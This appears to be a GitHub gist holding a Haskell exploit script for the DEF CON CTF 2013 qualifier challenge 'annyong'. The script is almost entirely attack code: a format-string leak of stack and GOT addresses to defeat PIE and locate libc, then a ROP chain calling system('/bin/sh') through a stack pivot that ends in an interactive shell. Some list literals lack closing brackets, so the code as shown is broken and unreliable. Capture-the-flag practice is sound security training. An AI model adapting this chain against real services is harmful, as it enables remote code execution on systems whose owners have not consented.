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Last active August 25, 2017 13:18
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#!/usr/bin/env stack
-- stack --stack-yaml ./stack.yaml runghc --package pwn
-- DEF CON CTF Qualifier 2013: annyong
{-# LANGUAGE OverloadedStrings #-}
import Data.Bits
import qualified Data.ByteString.Char8 as BS
import Data.Maybe
import Data.Monoid ((<>))
import Data.Word
import Numeric (showHex)
import Pwn
main :: IO ()
main = do
r <- remote "" 4000
let __libc_csu_init' = 0x00001130
printf_got' = 0x202038
libc_printf' = 0x00050cf0
libc_system' = 0x00041490
-- ROP gadgets
ret' = 0x00000ac5 -- 0x00000ac5: ret ; (17 found)
leave_ret' = 0x00000dc1 -- 0x00000dc1: leave ; ret ; (5 found)
libc_pop_rdi_ret' = 0x00022482 -- 0x00022482: pop rdi ; ret ; (480 found)
-- sub.stdin_184_8c ();
-- ; var int buf @ rbp-0x810
-- ; var int canary @ rbp-0x4
canary = 0x4
buflen = 0x810 - canary
info "leak informations"
-- gdb-peda$ pdisas $rip /1
-- => 0x5555555550bc: call 0x555555554ba0 <fgets@plt>
-- gdb-peda$ x/300gx $rdi
-- 0x7fffffffe150: 0x0000000000000000 0x0000000000000000
-- 0x7fffffffe160: 0x0000000000000000 0x0000000000000000
-- ...
-- 0x7fffffffe920: 0x0000000000000000 0x0000555555554ad3
-- 0x7fffffffe930: 0x00007fffffffea58 0x0000555555555175 <-- rbp2, __libc_csu_init+69
-- 0x7fffffffe940: 0x0000000000000000 0x0000000000000000
-- 0x7fffffffe950: 0x0000555555555130 0x0000000055554c60 <- _, canary
-- 0x7fffffffe960: 0x00007fffffffe970 0x0000555555555127 <- rbp1, main
-- 0x7fffffffe970: 0x0000000000000000 0x00007ffff7a52b45
let rbp2_index = 6 + ((0x7fffffffe930 - 0x7fffffffe150) `quot` 8)
__libc_csu_init_index = 6 + ((0x7fffffffe938 - 0x7fffffffe150) `quot` 8)
sendline r $ BS.pack $ "%" <> show rbp2_index <> "$p " <>
"%" <> show __libc_csu_init_index <> "$p"
rbp2:__libc_csu_init:_ <- map (read :: String -> Word64) . words . BS.unpack <$> recvline r
let rsp = rbp2 - 0x908
base = __libc_csu_init - 69 - __libc_csu_init'
success $ "rsp = 0x" <> showHex rsp ""
success $ "base = 0x" <> showHex base ""
sendline r $ BS.append "%7$6s " $ fromJust $ p64 $ base + printf_got'
leak <- recvn r 6
let Just libc_printf = u64 $ BS.append leak "\x00\x00"
libc_base = libc_printf - libc_printf'
success $ "libc = 0x" <> showHex libc_base ""
info "execute '/bin/sh'"
let rophead = rsp + 0x20
binsh = rsp + 0x8
rop = BS.concat $ catMaybes
[ p64 $ libc_base + libc_pop_rdi_ret'
, p64 binsh
, p64 $ libc_base + libc_system'
buf = BS.concat $ catMaybes
[ Just "NyaNya\x00\x00"
, Just "/bin/sh\x00"
, p64 rsp -- next rbp
, Just rop
, Just $ BS.replicate (buflen - 0x18 - BS.length rop) 'A'
, p32 0xdeadbeef -- break canary to trigger ROP
, p64 $ rsp + 0x10 -- stack pivoting
, p64 $ base + leave_ret'
sendline r buf
recvuntil r "NyaNya"
interactive r
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